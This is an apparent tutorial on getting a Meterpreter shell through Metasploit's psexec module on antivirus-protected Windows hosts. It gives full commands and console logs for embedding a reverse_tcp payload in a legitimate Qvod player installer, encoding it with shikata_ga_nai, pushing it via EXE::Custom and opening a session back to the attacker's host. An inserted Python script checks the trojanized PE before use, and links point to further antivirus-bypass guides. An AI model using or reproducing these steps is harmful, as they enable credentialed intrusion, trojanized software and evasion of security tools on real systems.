What is a payload? As the official Metasploit documentation puts it:
A payload is the piece of software that lets you control a computer system after it’s been exploited. The payload is typically attached to and delivered by the exploit. Just imagine an exploit that carries the payload in its backpack when it breaks into the system and then leaves the backpack there. Yes, it’s a corny description, but you get the picture. Metasploit’s most popular payload is called Meterpreter, which enables you to do all sorts of funky stuff on the target system. For example, you can upload and download files from the system, take screenshots, and collect password hashes. You can even take over the screen, mouse, and keyboard to fully control the computer. If you’re feeling particularly bad-ass, you can even turn on a laptop’s webcam and be a fly on the wall.
For both local and web-delivered payloads there are plenty of ways to get past security software: PowerShell on Win7, java_signed_applet for Java, AV evasion for browser exploits, and msfpayload for generating EXE and other file types.
But what about remote payloads? It is rare these days to find a PC or server with no security software installed.
Take psexec as an example: once you know the target's account and password it gives you a shell. After filling in the module options, set the PAYLOAD:
    msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
Run it.
No shell, contrary to expectations? Why? Most of the time the antivirus killed it.
Try a different PAYLOAD:
    msf exploit(psexec) > set PAYLOAD windows/meterpreter/bind_tcp
    PAYLOAD => windows/meterpreter/bind_tcp
    msf exploit(psexec) > exploit
    [*] Connecting to the server...
    [*] Started bind handler
    [*] Authenticating to 5.5.5.4:445|WORKGROUP as user 'administrator'...
    [*] Uploading payload...
    [*] Created \lJGSOEfc.exe...
    [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:5.5.5.4[\svcctl] ...
    [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:5.5.5.4[\svcctl] ...
    [*] Obtaining a service manager handle...
    [*] Creating a new service (GkoJyXLg - "MoAih")...
    [*] Closing service handle...
    [*] Opening service...
    [*] Starting the service...
    [-] Error: execution expired
That fails as well: the uploaded service binary is killed before it can listen, so the bind handler times out. At this point you can try the windows/download_exec_https style of payload, which fetches a file from a URL and runs it, but if the EXE or VBS it downloads is not AV-evading the result is exactly the same.
To get at least a temporary shell, you can do the following: use a legitimate program (here the Qvod player installer QvodSetup5.exe) as a template, keep the template's own behaviour with -k, and encode the payload over several iterations:
    root@Pc:/tmp# msfpayload windows/meterpreter/reverse_tcp LHOST=5.5.5.1 LPORT=4444 R | msfencode -t exe -x /tmp/QvodSetup5.exe -k -o brk.exe -e x86/shikata_ga_nai -c 5
    [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
    [*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
    [*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
    [*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
    [*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)
    root@Pc:/tmp# file brk.exe
    brk.exe: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
    root@Pc:/tmp#
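Before handing an executable built this way to EXE::Custom, a quick structural check is worth the minute it takes: that the file is still a 32-bit PE with the template's subsystem (GUI here, matching what `file` printed), whether the template is packed (the UPX sections `file` noticed), and where the entry point now points. The script below is an added example, not code from the original post or from Metasploit; it parses the PE headers with nothing but the Python standard library and reports those facts. The heuristic it applies, that a payload injected into a template ends up in an appended writable-and-executable section which the entry point jumps into, is an assumption about how template injection generally looks, not a statement about brk.exe, and the sample PE bytes it builds are constructed for the demo.

```python
#!/usr/bin/env python3
"""Added example: sanity-check a template-injected EXE before using it with EXE::Custom.
Standard library only; the PE32 header layout follows the PE/COFF specification."""
import struct
import sys

IMAGE_FILE_MACHINE_I386 = 0x14C
IMAGE_NT_OPTIONAL_HDR32_MAGIC = 0x10B
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
SUBSYSTEMS = {1: "NATIVE", 2: "WINDOWS_GUI", 3: "WINDOWS_CUI"}


def parse_pe(data):
    """Return machine, subsystem, entry point RVA and the section table of a PE32 image."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature: not a DOS/PE file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    coff = e_lfanew + 4
    machine, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != IMAGE_NT_OPTIONAL_HDR32_MAGIC:
        raise ValueError("not a PE32 image: a PE32+ (64-bit) template cannot carry an x86 payload")
    entry = struct.unpack_from("<I", data, opt + 16)[0]      # AddressOfEntryPoint
    subsystem = struct.unpack_from("<H", data, opt + 68)[0]  # Subsystem
    sections = []
    for i in range(nsections):
        (name, vsize, vaddr, rsize, raddr,
         _, _, _, _, chars) = struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({
            "name": name.rstrip(b"\0").decode("latin-1"),
            "vaddr": vaddr, "vsize": vsize, "raddr": raddr, "rsize": rsize,
            "exec": bool(chars & IMAGE_SCN_MEM_EXECUTE),
            "write": bool(chars & IMAGE_SCN_MEM_WRITE),
        })
    return {"machine": machine, "subsystem": SUBSYSTEMS.get(subsystem, hex(subsystem)),
            "entry": entry, "sections": sections}


def assess(data):
    """The flags a practitioner wants to see before `set EXE::Custom`."""
    info = parse_pe(data)
    last = info["sections"][-1]
    info["x86"] = info["machine"] == IMAGE_FILE_MACHINE_I386
    info["upx_packed"] = any(s["name"].startswith("UPX") for s in info["sections"])
    # Heuristic (an assumption, not a Metasploit guarantee): template injection appends a
    # W+X section and redirects the entry point into it, so the payload stub runs first
    # and the original program only afterwards.
    span = max(last["vsize"], last["rsize"])
    info["entry_in_last_section"] = last["vaddr"] <= info["entry"] < last["vaddr"] + span
    info["last_section_wx"] = last["exec"] and last["write"]
    return info


def build_sample_pe():
    """Constructed sample bytes (not the post's brk.exe): a PE32 GUI header shaped like
    a UPX-packed template with an appended W+X section that owns the entry point."""
    def sec(name, vaddr, vsize, raddr, rsize, chars):
        return struct.pack("<8sIIIIIIHHI", name, vsize, vaddr, rsize, raddr, 0, 0, 0, 0, chars)
    sections = (sec(b"UPX0", 0x1000, 0x20000, 0x400, 0, 0xE0000080)
                + sec(b"UPX1", 0x21000, 0x8000, 0x400, 0x8000, 0xE0000040)
                + sec(b".text", 0x29000, 0x1000, 0x8400, 0x400, 0xE0000020))
    entry = 0x29010  # inside the appended section
    opt = struct.pack("<HBBIIIIIIIIIHHHHHHIIIIHHIIIIII",
                      0x10B, 2, 25, 0x400, 0x8000, 0x20000, entry, 0x21000, 0x29000,
                      0x400000, 0x1000, 0x200, 4, 0, 1, 0, 4, 0, 0, 0x2A000, 0x400, 0,
                      2, 0x8000, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    opt += b"\0" * (16 * 8)  # 16 empty data directories: 224-byte optional header
    coff = struct.pack("<HHIIIHH", IMAGE_FILE_MACHINE_I386, 3, 0, 0, 0, len(opt), 0x102)
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)  # e_lfanew = 0x40
    return dos + b"PE\0\0" + coff + opt + sections


if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pe()
    for key, value in assess(blob).items():
        print(f"{key}: {value}")
```

Run it as `python3 pe_check.py brk.exe` to inspect a real file; with no argument it analyses the constructed sample. An architecture mismatch between payload and template is the first thing to rule out when the result crashes on the target, which is why the parser refuses PE32+ images outright. None of this says anything about whether AV will flag the file; it only tells you the binary you are about to push is the kind of binary you think it is, so test it in a VM before relying on it.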
Point the exploit at the custom executable:
    msf exploit(psexec) > set EXE::Custom /tmp/brk.exe
    EXE::Custom => /tmp/brk.exe
Run the exploit:
    msf exploit(psexec) > exploit
    [*] Started reverse handler on 5.5.5.1:4444
    [*] Connecting to the server...
    [*] Authenticating to 5.5.5.4:445|WORKGROUP as user 'administrator'...
    [*] Uploading payload...
    [*] Using custom executable /tmp/brk.exe, RHOST and RPORT settings will be ignored!
    [*] Created \rvUEPiZp.exe...
    [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:5.5.5.4[\svcctl] ...
    [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:5.5.5.4[\svcctl] ...
    [*] Obtaining a service manager handle...
    [*] Creating a new service (cazeVsDU - "MvmIaTXVREiiMlcePrzIFKpp")...
    [*] Closing service handle...
    [*] Opening service...
    [*] Starting the service...
    [*] Sending stage (752128 bytes) to 5.5.5.4
    [*] Meterpreter session 1 opened (5.5.5.1:4444 -> 5.5.5.4:1369) at 2012-12-04 19:19:49 +0800
We have our shell, and the Qvod player is running on the target as well, since -k preserved the template's original behaviour.
This is only one example; with set EXE::Custom you can supply any AV-evading backdoor of your own. Note that the module still starts its handler from its own PAYLOAD, LHOST and LPORT settings (the reverse handler on 5.5.5.1:4444 above), so those must match what was baked into the custom EXE, while the binary it uploads and runs as a service is yours rather than the generated one.
For more on AV evasion see:
http://fuzzexp.org/porting-the-public-exploits-to-metasploit.html
http://fuzzexp.org/msfpayload-and-msfencode-with-metasploit.html
http://fuzzexp.org/how-to-bypass-antivirus-with-metasploit.html
http://fuzzexp.org/msfpayload-script-msfpayload-generator-script.html